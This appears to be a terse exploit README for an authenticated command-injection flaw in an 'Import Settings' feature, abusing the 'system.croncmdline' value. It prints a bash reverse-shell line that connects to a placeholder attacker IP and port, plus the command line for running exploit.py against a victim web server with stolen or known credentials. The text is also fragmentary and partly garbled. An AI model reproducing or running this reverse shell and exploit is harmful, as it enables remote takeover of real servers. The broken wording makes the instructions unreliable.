Due to Improper data validation in “Import Settings” feature, an authenticated attacker can send crafted settings with malicious payload inside “system.croncmdline” value.
Requirement: PHP code must be executed on attacker machine
foo.txt
file. The contain of this file is a reverse shell to attacker machine, for example:#!/bin/bash
bash -i >& /dev/tcp/{ATTACKER-IP}/{ATTACKER-PORT} 0>&1
exploit.py
and required by this exploitpython3 exploit.py -t {VICTIM-WEBSERVER} -u {USERNAME} -p {PASSWORD} -s {ATTACKER-WEBSERVER} -lport {ATTACKER-LISTENING-PORT}